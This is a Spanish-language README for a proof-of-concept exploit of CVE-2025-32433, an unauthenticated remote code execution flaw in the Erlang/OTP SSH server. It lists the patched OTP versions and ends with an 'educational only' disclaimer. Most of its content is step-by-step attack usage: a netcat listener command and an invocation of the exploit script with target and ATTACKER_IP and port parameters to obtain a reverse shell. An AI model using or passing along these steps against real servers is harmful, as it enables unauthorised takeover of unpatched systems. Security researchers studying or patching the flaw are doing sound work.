
PoC que muestra ejecución remota de código no autenticada en el servidor SSH de Erlang/OTP. Al explotar una falla en el manejo de mensajes del protocolo SSH, un atacante puede ejecutar comandos arbitrarios en el objetivo sin credenciales válidas.
PoC que muestra ejecución remota de código no autenticada en el servidor SSH de Erlang/OTP.
Al explotar una falla en el manejo de mensajes del protocolo SSH, un atacante puede ejecutar comandos arbitrarios en el objetivo sin credenciales válidas.
Este problema está parcheado en OTP-27.3.3, OTP-26.2.5.11 y OTP-25.3.2.20.
Configuración del Listener:
nc -lvnp 1234
Ejecutar Exploit:
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : IP del objetivo--rport : Puerto SSH del objetivo--lhost : Tu IP para la shell inversa--lport : Tu puerto de escucha

Este repositorio es solo para fines educativos. No uses este exploit contra sistemas que no poseas o para los cuales no tengas permiso explícito de prueba. El uso indebido puede ser ilegal y está estrictamente prohibido.